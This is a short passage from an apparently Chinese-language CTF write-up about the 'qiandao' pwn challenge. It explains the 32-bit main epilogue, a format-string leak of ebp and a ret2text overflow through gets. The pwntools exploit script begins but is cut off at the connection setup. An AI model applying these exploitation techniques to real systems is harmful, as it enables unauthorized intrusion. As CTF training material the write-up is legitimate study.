做了pwn1跟pwn3,pwn2没做出来(俺是废物)…
pwn1
签到题,但是我们要记住
.text:080485F8 mov eax, 0
.text:080485FD mov ecx, [ebp+var_4]
.text:08048600 leave
.text:08048601 lea esp, [ecx-4]
.text:08048604 retn
32位的main的最后有一个将ebp转为esp的代码,如果你栈溢出破坏了ebp,会导致[ecx-4]报错,
因此这个题的做法也很简单,利用格式化字符串漏洞泄露ebp,然后通过gets来进行ret2text
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('qiandao')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./qiandao')
else:
p = remote(ip,port